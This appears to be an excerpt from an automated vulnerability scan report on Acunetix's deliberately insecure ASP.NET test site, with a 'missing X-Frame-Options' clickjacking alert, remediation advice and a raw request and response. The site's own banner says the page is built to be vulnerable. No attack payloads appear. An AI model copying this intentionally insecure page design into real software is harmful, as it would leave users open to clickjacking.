cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3761 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (3761 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 17924Response body (17924 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln 